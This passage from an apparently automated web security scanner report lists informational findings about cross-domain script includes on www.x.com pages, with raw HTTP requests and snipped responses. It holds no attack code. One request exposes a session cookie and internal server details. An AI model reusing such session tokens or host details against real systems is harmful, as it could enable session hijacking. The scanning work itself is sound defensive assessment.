Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=65196 t=1313157092114256
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.108. https://www.x.com/doc-publish.jspa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /doc-publish.jspa

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /doc-publish.jspa HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 500 Internal Server Error
Date: Fri, 12 Aug 2011 13:58:41 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=24354 t=1313157521095937
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.109. https://www.x.com/docs/DOC-1031  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1031

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-1031 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:48 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313033313b3130322c313337323b3130322c313035313b3130322c313631333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:48 GMT; Path=/
Vary: User-Agent
JP: D=96847 t=1313157228488141
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.110. https://www.x.com/docs/DOC-1041  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1041

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-1041 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:07 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313034313b3130322c313130383b3130322c333833363b3130322c313333323b3130322c313535313b3130322c333230313b3130322c323234313b3130322c333237313b3130322c333332313b3130322c333332323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:07 GMT; Path=/
Vary: User-Agent
JP: D=129414 t=1313157247469487
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.111. https://www.x.com/docs/DOC-1051  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1051

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-1051 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313035313b3130322c313631333b3130322c313337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:48 GMT; Path=/
Vary: User-Agent
JP: D=159037 t=1313157228026431
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.112. https://www.x.com/docs/DOC-1106  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1106

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-1106 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/button_manager
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030373b31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:40:09 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030373b31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c313130363b3130322c333831313b332c38383139383b332c3133383934323b332c38373839383b332c3134303532383b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b; Expires=Sun, 11-Sep-2011 13:40:10 GMT; Path=/
Vary: User-Agent
JP: D=139511 t=1313156410450395
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.113. https://www.x.com/docs/DOC-1106/delete  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1106/delete

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-1106/delete HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 500 Internal Server Error
Date: Fri, 12 Aug 2011 13:54:09 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=30487 t=1313157250046861
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.114. https://www.x.com/docs/DOC-1106/restore  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1106/restore

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-1106/restore HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 500 Internal Server Error
Date: Fri, 12 Aug 2011 13:54:09 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=46640 t=1313157249824805
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.115. https://www.x.com/docs/DOC-1108  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1108

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-1108 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:05 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313130383b3130322c333833363b3130322c313535313b3130322c333230313b3130322c323234313b3130322c333237313b3130322c333332313b3130322c333332323b3130322c333335313b3130322c333335323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:06 GMT; Path=/
Vary: User-Agent
JP: D=99860 t=1313157246030665
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.116. https://www.x.com/docs/DOC-1116  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1116

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-1116 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313130363b3130322c313433313b3130322c313337343b3130322c313333323b3130322c313034313b3130322c313130383b3130322c333833363b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:12 GMT; Path=/
Vary: User-Agent
JP: D=130471 t=1313157252790233
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.117. https://www.x.com/docs/DOC-1176  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1176

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-1176 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:15 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313130363b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:15 GMT; Path=/
Vary: User-Agent
JP: D=129417 t=1313157255561975
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.118. https://www.x.com/docs/DOC-1204  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1204

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-1204 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313130363b3130322c313433313b3130322c313337343b3130322c313333323b3130322c313034313b3130322c313130383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:13 GMT; Path=/
Vary: User-Agent
JP: D=312167 t=1313157253541541
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.119. https://www.x.com/docs/DOC-1216  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1216

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-1216 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:11 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313231363b3130322c323334363b3130322c313130363b3130322c313433313b3130322c313337343b3130322c313333323b3130322c313034313b3130322c313130383b3130322c333833363b3130322c313535313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:12 GMT; Path=/
Vary: User-Agent
JP: D=91982 t=1313157252137257
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.120. https://www.x.com/docs/DOC-1332  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1332

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-1332 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:06 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313333323b3130322c313130383b3130322c333833363b3130322c313535313b3130322c333230313b3130322c323234313b3130322c333237313b3130322c333332313b3130322c333332323b3130322c333335313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:06 GMT; Path=/
Vary: User-Agent
JP: D=140843 t=1313157246673403
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.121. https://www.x.com/docs/DOC-1372  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1372

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-1372 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313337323b3130322c313631333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:47 GMT; Path=/
Vary: User-Agent
JP: D=87320 t=1313157227528974
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.122. https://www.x.com/docs/DOC-1374  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1374

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-1374 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:08 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313337343b3130322c313333323b3130322c313130383b3130322c313034313b3130322c333833363b3130322c313535313b3130322c333230313b3130322c323234313b3130322c333237313b3130322c333332313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:08 GMT; Path=/
Vary: User-Agent
JP: D=92665 t=1313157248423211
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.123. https://www.x.com/docs/DOC-1401  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1401

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-1401 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313430313b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313230343b3130322c313130363b3130322c313433313b3130322c313337343b3130322c313333323b3130322c313034313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:14 GMT; Path=/
Vary: User-Agent
JP: D=292571 t=1313157254169391
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.124. https://www.x.com/docs/DOC-1431  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1431

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /docs/DOC-1431 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:08 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313433313b3130322c313333323b3130322c313337343b3130322c313034313b3130322c313130383b3130322c333833363b3130322c313535313b3130322c333230313b3130322c323234313b3130322c333237313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:09 GMT; Path=/
Vary: User-Agent
JP: D=208093 t=1313157248979182
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
